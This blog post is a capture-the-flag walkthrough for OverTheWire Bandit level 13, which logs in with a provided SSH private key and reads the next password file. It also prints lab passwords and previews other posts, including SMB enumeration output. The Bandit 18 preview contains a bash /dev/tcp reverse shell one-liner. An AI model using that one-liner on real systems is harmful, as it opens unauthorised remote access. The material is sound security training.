Skip to main content

Bandit 13 Over The Wire

Lessons Learned

using ssh -i filename user@localhost which is the private key ssh connection

Logging in

On a kali vm/ linux machine
Type:

ssh bandit13@bandit.labs.overthewire.org -p 2220
8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL

Completing The Challenge

The Goal:

The password for the next level is stored in /etc/bandit_pass/bandit14 and can only be read by user bandit14. For this level, you don’t get the next password, but you get a private SSH key that can be used to log into the next level. Note: localhost is a hostname that refers to the machine you are working on

The Solution:

  • ssh -i sshkey.private bandit14@localhost

the above command is use because we already have the private key. private keys should be used very carefully. Since we are already on the machine that hosts Bandit Over The Wire, we don't need to call the correct name, localhost will means the machine talks to itself. I don't know why, but specifying a port here caused issues. My assumption is the profiles is listening for connections on port 22 not port 2220 at least internally/private key connections

  •  type yes and ENTER when prompted

after verifying you are bandit14:

  • cat /etc/bandit_pass/bandit14
  • 4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e

Labels:

Comments

Post a Comment

Popular posts from this blog

Network Services

Network Services https://tryhackme.com/room/networkservices 3. Enumerating SMB Conduct an nmap scan of your choosing, How many ports are open? running nmap 10.10.197.190 results in PORT STATE SERVICE 22/tcp open ssh 139/tcp open netbios-ssn 445/tcp open microsoft-ds MAC Address: 02:21:CD:94:98:F5 (Unknown) Show/Hide What ports is SMB running on? 139/445 Show/Hide this is the known default values for SMB Let's get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name? WORKGROUP Show/Hide looking at the rest of the info from enum4linux -a 10.10.197.190 ill summarize here ========================== | Target Information | ========================== Target ........... 10.10.197.190 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none =================================================...
Post a Comment
Read more

Bandit 12 Over The Wire

Lessons Learned extracting and decompressing files using the following tools: file, xxd -r, gunzip, bunsip2, and tar -xf Logging in On a kali vm/ linux machine Type: ssh bandit12@bandit.labs.overthewire.org -p 2220  5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu Completing The Challenge The Goal: The password for the next level is stored in the file data.txt , which is a hexdump of a file that has been repeatedly compressed. For this level it may be useful to create a directory under /tmp in which you can work using mkdir. For example: mkdir /tmp/myname123. Then copy the datafile using cp, and rename it using mv (read the manpages!) The Solution:      Revamped:         I decided to write a bash file that solves the problem.                    mkdir /tmp/a_name/                    mv data.txt /tmp/a_name      ...
Post a Comment
Read more

Bandit 18 Over The Wire

Lessons Learned ssh actions for when bashrc has immediate logout, also has advice on some reverse shell one liners Logging in On a kali vm/ linux machine Type: ssh bandit18@bandit.labs.overthewire.org -p 2220 kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd Completing The Challenge The Goal: The password for the next level is stored in a file readme in the homedirectory. Unfortunately, someone has modified .bashrc to log you out when you log in with SSH. The Solution: kali@kali:~$ ssh bandit18@bandit.labs.overthewire.org -p 2220 'cat ~/readme' This is a OverTheWire game server. More information on http://www.overthewire.org/wargames bandit18@bandit.labs.overthewire.org's password: IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x Ive made reverse shells by doing one liner tcp calls using stuff like the following in the single quotes and by mixing commands using like the following: bash -i > & /dev/tcp/10.0.0.1/8080 0 > & 1  
Post a Comment
Read more